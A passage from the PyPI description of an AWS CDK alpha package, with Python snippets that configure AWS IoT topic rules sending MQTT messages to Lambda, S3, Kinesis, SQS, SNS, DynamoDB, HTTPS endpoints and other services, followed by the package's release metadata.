Firehose stream * Send messages to SQS queues * Publish messages on SNS topics * Write messages into columns of DynamoDB * Put messages to an IoT Events input * Send messages to HTTPS endpoints ## Republish a message to another MQTT topic The code snippet below creates an AWS IoT Rule that republishes a message to another MQTT topic when it is triggered. ```python iot.TopicRule(self, "TopicRule", sql=iot.IotSql.from_string_as_ver20160323("SELECT topic(2) as device_id, timestamp() as timestamp, temperature FROM 'device/+/data'"), actions=[ actions.IotRepublishMqttAction("${topic()}/republish", quality_of_service=actions.MqttQualityOfService.AT_LEAST_ONCE ) ] ) ``` ## Invoke a Lambda function The code snippet below creates an AWS IoT Rule that invokes a Lambda function when it is triggered.
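The `topic(2)` call in the SQL statements above selects the second slash-separated segment of the incoming MQTT topic (segments are 1-indexed in the AWS IoT SQL reference), while `topic()` with no argument returns the whole topic. A minimal stand-in for the function, for illustration only:

```python
def iot_topic(topic, n=None):
    """Mimic the AWS IoT SQL topic() function: the whole topic name,
    or its n-th slash-separated segment (1-indexed) when n is given."""
    return topic if n is None else topic.split("/")[n - 1]
```

For a message published on `device/001/data`, `topic(2)` therefore yields the device id `001`.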
```python func = lambda_.Function(self, "MyFunction", runtime=lambda_.Runtime.NODEJS_LATEST, handler="index.handler", code=lambda_.Code.from_inline(""" exports.handler = (event) => { console.log("This is a test of the Lambda action for an AWS IoT Rule.", event); };""") ) iot.TopicRule(self, "TopicRule", sql=iot.IotSql.from_string_as_ver20160323("SELECT topic(2) as device_id, timestamp() as timestamp, temperature FROM 'device/+/data'"), actions=[actions.LambdaFunctionAction(func)] ) ``` ## Put objects to an S3 bucket The code snippet below creates an AWS IoT Rule that puts objects to an S3 bucket when it is triggered. ```python bucket = s3.Bucket(self, "MyBucket") iot.TopicRule(self, "TopicRule", sql=iot.IotSql.from_string_as_ver20160323("SELECT topic(2) as device_id FROM 'device/+/data'"), actions=[actions.S3PutObjectAction(bucket)] ) ``` The property `key` of `S3PutObjectAction` is given the value `${topic()}/${timestamp()}` by default. `${topic()}` and `${timestamp()}` are called substitution templates. For more information, see [this documentation](https://docs.aws.amazon.com/iot/latest/developerguide/iot-substitution-templates.html). In the above sample, `${topic()}` is replaced by the incoming MQTT topic, such as `device/001/data`, and `${timestamp()}` is replaced by the current timestamp in milliseconds, such as `1636289461203`. So if the MQTT broker receives the MQTT topic `device/001/data` on `2021-11-07T00:00:00.000Z`, the S3 bucket object will be put to `device/001/data/1636243200000`.
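The default key rendering described above can be sketched in plain Python; `render_s3_key` is illustrative only, not part of the action's API. It reproduces the worked example: a message on `device/001/data` received at `2021-11-07T00:00:00.000Z` yields the object key `device/001/data/1636243200000`.

```python
from datetime import datetime, timezone

def render_s3_key(template: str, topic: str, received_at: datetime) -> str:
    """Render the default ${topic()}/${timestamp()} key (illustrative sketch)."""
    millis = int(received_at.timestamp() * 1000)  # timestamp() is milliseconds since epoch
    return template.replace("${topic()}", topic).replace("${timestamp()}", str(millis))

key = render_s3_key(
    "${topic()}/${timestamp()}",
    "device/001/data",
    datetime(2021, 11, 7, tzinfo=timezone.utc),
)
# key == "device/001/data/1636243200000"
```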
You can also set a specific `key` as follows: ```python bucket = s3.Bucket(self, "MyBucket") iot.TopicRule(self, "TopicRule", sql=iot.IotSql.from_string_as_ver20160323("SELECT topic(2) as device_id, year, month, day FROM 'device/+/data'"), actions=[ actions.S3PutObjectAction(bucket, key="${year}/${month}/${day}/${topic(2)}" ) ] ) ``` If you want to set access control on the S3 bucket object, you can specify `accessControl` as follows: ```python bucket = s3.Bucket(self, "MyBucket") iot.TopicRule(self, "TopicRule", sql=iot.IotSql.from_string_as_ver20160323("SELECT * FROM 'device/+/data'"), actions=[ actions.S3PutObjectAction(bucket, access_control=s3.BucketAccessControl.PUBLIC_READ ) ] ) ``` ## Put logs to CloudWatch Logs The code snippet below creates an AWS IoT Rule that puts logs to CloudWatch Logs when it is triggered. ```python import aws_cdk.aws_logs as logs log_group = logs.LogGroup(self, "MyLogGroup") iot.TopicRule(self, "TopicRule", sql=iot.IotSql.from_string_as_ver20160323("SELECT topic(2) as device_id FROM 'device/+/data'"), actions=[actions.CloudWatchLogsAction(log_group)] ) ``` ## Capture CloudWatch metrics The code snippet below creates an AWS IoT Rule that captures CloudWatch metrics when it is triggered. ```python topic_rule = iot.TopicRule(self, "TopicRule", sql=iot.IotSql.from_string_as_ver20160323("SELECT topic(2) as device_id, namespace, unit, value, timestamp FROM 'device/+/data'"), actions=[ actions.CloudWatchPutMetricAction( metric_name="${topic(2)}", metric_namespace="${namespace}", metric_unit="${unit}", metric_value="${value}", metric_timestamp="${timestamp}" ) ] ) ``` ## Start Step Functions State Machine The code snippet below creates an AWS IoT Rule that starts a Step Functions State Machine when it is triggered.
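The custom `${year}/${month}/${day}/${topic(2)}` key above combines fields selected in the SQL statement (`year`, `month`, `day`) with the second topic segment. A toy renderer under those assumptions (the function name is illustrative, not CDK API):

```python
def render_partitioned_key(payload: dict, topic: str) -> str:
    """Render "${year}/${month}/${day}/${topic(2)}" from the message and topic (sketch)."""
    device_id = topic.split("/")[1]  # topic(2): second segment, 1-indexed
    return f"{payload['year']}/{payload['month']}/{payload['day']}/{device_id}"
```

A message `{"year": 2021, "month": 11, "day": 7}` on `device/001/data` would land under `2021/11/7/001`.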
```python state_machine = stepfunctions.StateMachine(self, "SM", definition_body=stepfunctions.DefinitionBody.from_chainable(stepfunctions.Wait(self, "Hello", time=stepfunctions.WaitTime.duration(Duration.seconds(10)))) ) iot.TopicRule(self, "TopicRule", sql=iot.IotSql.from_string_as_ver20160323("SELECT * FROM 'device/+/data'"), actions=[ actions.StepFunctionsStateMachineAction(state_machine) ] ) ``` ## Change the state of an Amazon CloudWatch alarm The code snippet below creates an AWS IoT Rule that changes the state of an Amazon CloudWatch alarm when it is triggered: ```python import aws_cdk.aws_cloudwatch as cloudwatch metric = cloudwatch.Metric( namespace="MyNamespace", metric_name="MyMetric", dimensions_map={"MyDimension": "MyDimensionValue"} ) alarm = cloudwatch.Alarm(self, "MyAlarm", metric=metric, threshold=100, evaluation_periods=3, datapoints_to_alarm=2 ) topic_rule = iot.TopicRule(self, "TopicRule", sql=iot.IotSql.from_string_as_ver20160323("SELECT topic(2) as device_id FROM 'device/+/data'"), actions=[ actions.CloudWatchSetAlarmStateAction(alarm, reason="AWS IoT Rule action is triggered", alarm_state_to_set=cloudwatch.AlarmState.ALARM ) ] ) ``` ## Put records to Kinesis Data stream The code snippet below creates an AWS IoT Rule that puts records to a Kinesis Data stream when it is triggered. ```python import aws_cdk.aws_kinesis as kinesis stream = kinesis.Stream(self, "MyStream") topic_rule = iot.TopicRule(self, "TopicRule", sql=iot.IotSql.from_string_as_ver20160323("SELECT * FROM 'device/+/data'"), actions=[ actions.KinesisPutRecordAction(stream, partition_key="${newuuid()}" ) ] ) ``` ## Put records to Amazon Data Firehose stream The code snippet below creates an AWS IoT Rule that puts records to an Amazon Data Firehose stream when it is triggered.
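With `batch_mode=True` and a `NEWLINE` record separator, as in the Firehose example below, each delivered record is framed with a trailing separator so downstream consumers can split the stored stream back into records. Conceptually (this sketch is not the Firehose API):

```python
def frame_records(records, separator="\n"):
    """Append the configured separator to each record (conceptual sketch of
    what a record separator setting produces in the delivered stream)."""
    return "".join(record + separator for record in records)
```

Two JSON records framed this way arrive as one newline-delimited blob.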
```python import aws_cdk.aws_kinesisfirehose as firehose bucket = s3.Bucket(self, "MyBucket") stream = firehose.DeliveryStream(self, "MyStream", destination=firehose.S3Bucket(bucket) ) topic_rule = iot.TopicRule(self, "TopicRule", sql=iot.IotSql.from_string_as_ver20160323("SELECT * FROM 'device/+/data'"), actions=[ actions.FirehosePutRecordAction(stream, batch_mode=True, record_separator=actions.FirehoseRecordSeparator.NEWLINE ) ] ) ``` ## Send messages to an SQS queue The code snippet below creates an AWS IoT Rule that sends messages to an SQS queue when it is triggered: ```python import aws_cdk.aws_sqs as sqs queue = sqs.Queue(self, "MyQueue") topic_rule = iot.TopicRule(self, "TopicRule", sql=iot.IotSql.from_string_as_ver20160323("SELECT topic(2) as device_id, year, month, day FROM 'device/+/data'"), actions=[ actions.SqsQueueAction(queue, use_base64=True ) ] ) ``` ## Publish messages on an SNS topic The code snippet below creates an AWS IoT Rule that publishes messages to an SNS topic when it is triggered: ```python import aws_cdk.aws_sns as sns topic = sns.Topic(self, "MyTopic") topic_rule = iot.TopicRule(self, "TopicRule", sql=iot.IotSql.from_string_as_ver20160323("SELECT topic(2) as device_id, year, month, day FROM 'device/+/data'"), actions=[ actions.SnsTopicAction(topic, message_format=actions.SnsActionMessageFormat.JSON ) ] ) ``` ## Write attributes of a message to DynamoDB The code snippet below creates an AWS IoT rule that writes all or part of an MQTT message to DynamoDB using the DynamoDBv2 action.
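The `use_base64=True` flag in the SQS example above asks the rule to base64-encode the message body before sending it, which keeps binary payloads safe in an SQS message. The encoding itself is standard base64:

```python
import base64

def encode_payload(payload: bytes) -> str:
    """Base64-encode a message body, as an SQS action does with use_base64 enabled."""
    return base64.b64encode(payload).decode("ascii")
```

The consumer then base64-decodes the body to recover the original bytes.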
```python import aws_cdk.aws_dynamodb as dynamodb # table: dynamodb.Table topic_rule = iot.TopicRule(self, "TopicRule", sql=iot.IotSql.from_string_as_ver20160323("SELECT * FROM 'device/+/data'"), actions=[ actions.DynamoDBv2PutItemAction(table) ] ) ``` ## Put messages to an IoT Events input The code snippet below creates an AWS IoT Rule that puts messages to an IoT Events input when it is triggered: ```python import aws_cdk.aws_iotevents_alpha as iotevents import aws_cdk.aws_iam as iam # role: iam.IRole input = iotevents.Input(self, "MyInput", attribute_json_paths=["payload.temperature", "payload.transactionId"] ) topic_rule = iot.TopicRule(self, "TopicRule", sql=iot.IotSql.from_string_as_ver20160323("SELECT * FROM 'device/+/data'"), actions=[ actions.IotEventsPutMessageAction(input, batch_mode=True, # optional property, default is 'false' message_id="${payload.transactionId}", # optional property, default is a new UUID role=role ) ] ) ``` ## Send Messages to HTTPS Endpoints The code snippet below creates an AWS IoT Rule that sends messages to an HTTPS endpoint when it is triggered: ```python topic_rule = iot.TopicRule(self, "TopicRule", sql=iot.IotSql.from_string_as_ver20160323("SELECT topic(2) as device_id, year, month, day FROM 'device/+/data'") ) topic_rule.add_action( actions.HttpsAction("https://example.com/endpoint", confirmation_url="https://example.com", headers=[actions.HttpActionHeader(key="key0", value="value0"), actions.HttpActionHeader(key="key1", value="value1") ], auth=actions.HttpActionSigV4Auth(service_name="serviceName", signing_region="us-east-1") )) ``` You can enable batching to reduce costs and improve efficiency: ```python from aws_cdk import Duration, Size # topic_rule: iot.TopicRule topic_rule.add_action( actions.HttpsAction("https://example.com/endpoint", batch_config=actions.HttpActionBatchConfig( max_batch_open_duration=Duration.millis(100), max_batch_size=5, max_batch_size_bytes=Size.kibibytes(1) ) )) ``` For more information about the batching
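The batch configuration above bounds a batch three ways: how long it may stay open, how many records it may hold, and how many bytes it may contain. A toy flush predicate for the count and byte limits (names and defaults mirror the example's `max_batch_size=5` and 1 KiB; this is an illustration, not the service's implementation):

```python
def should_flush(batch, new_record, max_batch_size=5, max_batch_bytes=1024):
    """Return True when adding new_record would exceed the count or byte limits,
    so the current batch must be flushed first (illustrative sketch)."""
    too_many = len(batch) + 1 > max_batch_size
    too_big = sum(len(r) for r in batch) + len(new_record) > max_batch_bytes
    return too_many or too_big
```

The open-duration limit would additionally force a flush on a timer even when neither size limit is hit.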
configuration, see the [AWS IoT Core documentation](https://docs.aws.amazon.com/iot/latest/developerguide/http_batching.html). ## Write Data to OpenSearch Service The code snippet below creates an AWS IoT Rule that writes data to an OpenSearch Service domain when it is triggered: ```python import aws_cdk.aws_opensearchservice as opensearch # domain: opensearch.Domain topic_rule = iot.TopicRule(self, "TopicRule", sql=iot.IotSql.from_string_as_ver20160323("SELECT topic(2) as device_id, year, month, day FROM 'device/+/data'") ) topic_rule.add_action(actions.OpenSearchAction(domain, id="my-id", index="my-index", type="my-type" )) ```
text/markdown
Amazon Web Services
null
null
null
Apache-2.0
null
[ "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: JavaScript", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Typing :: Typed", ...
[]
https://github.com/aws/aws-cdk
null
~=3.9
[]
[]
[]
[ "aws-cdk-lib<3.0.0,>=2.239.0", "aws-cdk.aws-iot-alpha==2.239.0.a0", "aws-cdk.aws-iotevents-alpha==2.239.0.a0", "constructs<11.0.0,>=10.5.0", "jsii<2.0.0,>=1.126.0", "publication>=0.0.3", "typeguard==2.13.3" ]
[]
[]
[]
[ "Source, https://github.com/aws/aws-cdk.git" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T21:58:02.667772
aws_cdk_aws_iot_actions_alpha-2.239.0a0.tar.gz
127,363
27/b3/bd9d758b2db5273857b7ee2dc94033aaaa62ebf332317236108a75086fc1/aws_cdk_aws_iot_actions_alpha-2.239.0a0.tar.gz
source
sdist
null
false
ddffd05c56079ff5e2cfc99e197220db
7ecd96917283627fb646bb06b05fcaa8f5ed0a77d3715052bd488754ba274c28
27b3bd9d758b2db5273857b7ee2dc94033aaaa62ebf332317236108a75086fc1
null
[]
0